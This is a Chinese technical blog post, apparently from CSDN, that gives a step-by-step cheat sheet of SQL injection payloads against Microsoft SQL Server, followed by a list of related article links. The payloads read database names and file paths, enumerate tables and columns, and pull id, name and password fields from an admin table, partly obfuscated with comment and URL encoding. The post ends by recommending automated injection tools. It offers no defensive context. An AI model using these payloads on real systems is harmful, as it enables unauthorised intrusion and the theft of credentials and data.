mssql数据库注入-public权限

最新推荐文章于 2024-07-12 16:35:20 发布
最新推荐文章于 2024-07-12 16:35:20 发布
阅读量242 收藏
点赞数
分类专栏: it 文章标签: 数据库 sqlserver
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arissa666/article/details/131834899
版权

获取数据库名字

and db_name()=0--

获取所有数据库名和路径

%20and%200=(select%20top%201%20cast([name]%20as%20nvarchar(256))%2bchar(94)%2bcast([filename]%20as%20nvarchar(256))%20from%20(select%20top%202%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--

 获得表名

having 1=1--

 用的到的字段继续

group by admin.id having 1=1--

group by admin.id,admin.name having 1=1--

 

用获得的数据库名,表名,字段名得到字段内容

/**/and/**/(select/**/top/**/1/**/isnull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]/**/as/**/nvarchar(4000)),char(32))/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/group/**/by/**/id))%3E0/**/and/**/1=1

 

 这种操作比较慢,可以用havij、穿山甲、sqlmap工具

学海无涯一叶扁舟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mssql-jdbc-10.2.0.jre8.jar jre11,jre17
03-18
java jdbc方式连接mysql的驱动,来自MS官网下载地址。 https://docs.microsoft.com/zh-cn/sql/connect/jdbc/download-microsoft-jdbc-driver-for-sql-server?view=sql-server-ver15
mssql-jdbc-6.4.0.jre8.jar
06-23
DBC Driver 6.4 在每个安装包中包含三个 JAR 类库:mssql-jdbc-6.4.0.jre7.jar 、mssql-jdbc-6.4.0.jre8.jar 和 mssql-jdbc-6.4.0.jre9.jar 。 JDBC Driver 6.4 专门适用于各种主要 Java 虚拟机且受到这些虚拟机的...
SQL Server public 角色权限管理
热门推荐
三空道人的博客
09-02 1万+
服务器角色public 所有登陆名都属于public服务器角色,登陆名是不能移除public角色的,且public角色是不能删除的。这对于我们来说是相当恐怖的事情,因为权限分配的第一原则即最小权限原则,对于一个不可掌控的权限,我们的心里是非常忐忑的。那么public角色具有哪些权限?属于public角色的成员能做些什么操作?public权限是否可以收回?本文将带你解决这些问题。 public ...
SQL行列转换
weixin_44024821的博客
07-04 104
1.SQL行转列 建表: create table public.row_change_column (name varchar(100), course varchar(100), score int) ; 插入数据 : insert into public.row_change_column select ‘zhangsan’,‘语文’,82 union select ‘zhangsan’,‘...
理解oracle数据库中的public用户的作用
WANGHAITING123的专栏
12-21 1642
ORACLE PUBLIC 用户 功能 作用
oracle数据库中的public用户的作用
Oracle学习之路
11-10 9088
public不是角色,你可以理解为所有数据库用户的集合。 如果某个权限赋于了public,那么所以数据库用户都可以有这个权限(当然有些用户可能连connect的权限都可以没有)。 比如把一个对象t1给所有用户有select 权限 grant select on user1.t1 to public; create public synonym t1 for t1; 那么所有的p
MSSQL数据库SQL注入手册1
08-08
MSSQL数据库SQL注入手册1
E105-数据库安全-手工注入mssql数据库.pdf
12-02
E105-数据库安全-手工注入mssql数据库
Mssql数据库系统安全加固规范.doc
12-14
例如,ELK-Mssql-02-01-01规定了日志的记录和存储方式,以便追踪数据库的操作记录和异常事件。 通信协议是Mssql数据库系统安全的重要组成部分。该规范规定了通信协议的要求,包括加密、身份验证和访问控制等。例如...
SQLServerpublic服务器角色
天天向尚 的专栏
04-20 1万+
在服务器上创建的每个登录名都是 public 服务器角色的成员,它只拥有的权限是VIEW ANY DATABASE。 public角色有两大特点: 第一,初始状态时没有权限; 第二,所有的数据库用户都是它的成员,因此不能将用户、组或角色指派为public角色的成员,也不能删除public角色的成员。 public角色作用:可以通过对public设置权限从而为所有数据库设置相同的权限。 请
SQL server2005服务器登录名、角色、数据库用户、角色、架构的关系
wangsen2235068的专栏
10-21 1万+
总结: 说到底,还是数据库权限分配的问题,做过权限管理的可能更容易理解。 1. 服务器登陆名,sa就是一个服务器登陆名。ConnectionString中的user="myloginname",myloginname就是你连接的数据库用户名,pwd="mypass",mypass是myloginname的密码. 新建一个登录名的时候,默认数据库是master(如果选择了,其他数据库,那么,其
SQL Server中public进一步的说明
legendaryhaha的博客
05-30 2782
之所以写这篇文章,是因为我纠结下面这个问题? 首先,我创建了一个用户user1,赋予它对sc表查,删,该的权限 即: grant select,update,delete on sc to user1 再创建一个user5用户后,赋予它们对SM数据库public角色,然后,我赋予全部用 户对表SC的SELECT权限通过使用public。 ...
初始C++
2302_81016149的博客
07-08 805
在C语言我们学习函数的时候,我们学习过生命周期这个概念。那么,什么是生命周期呢?生命周期通常指的是一个对象或变量从创建到销毁所经历的时间段。那么,命名空间是什么?咱们可以这样理解:在这个空间的生命周期内,对这个空间内的全部标识符起一个名字,可对其进行引用,可类似与C语言中的结构体。#include<stdlib.h>//此处不包此头文件代码可正常运行,那该如何解决此处情况呢?int main()//此处编译不通过原因为:在不包头文件前为变量,包含后为函数。return 0;
set user & password for database 设置数据库 用户和密码
DavidsonGong的博客
07-12 96
USE sbms;
mysql笔记1
m0_62975692的博客
07-11 248
首先查看systemctl status mysqld,如果是关闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!
docker-compose安装PolarDB-PG数据库
wnfff的博客
07-12 201
docker-compose安装PolarDB-PG数据库
Redis数据结构-String篇
最新发布
时间如瑾 代码如诗
07-12 512
对⼀个内部表示成long型的string执行append, setbit, getrange这些命令,针对的仍然是string的值(即⼗进制表示的字符串),而不是针对内部表⽰的long型进⾏操作。因此,在这些命令的实现中,会把long型先转成字符串再进行相应的操作。String 的内部存储结构⼀般是 sds(Simple Dynamic String,可以动态扩展内存),但是如果⼀个String 类型的 value 的值是数字,那么 Redis 内部会把它转成 long 类型来存储,从⽽减少内存的使用。
sqlmap --os-shell mssql数据库原理详解
06-09
总之,SQL 注入漏洞和 MSSQL 数据库是两个不同的概念,SQLMAP 是一种利用 SQL 注入漏洞的工具,可以通过 `--os-shell` 参数获取操作系统的交互式shell,而 MSSQL 是一种常见的关系型数据库管理系统,用于管理和操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值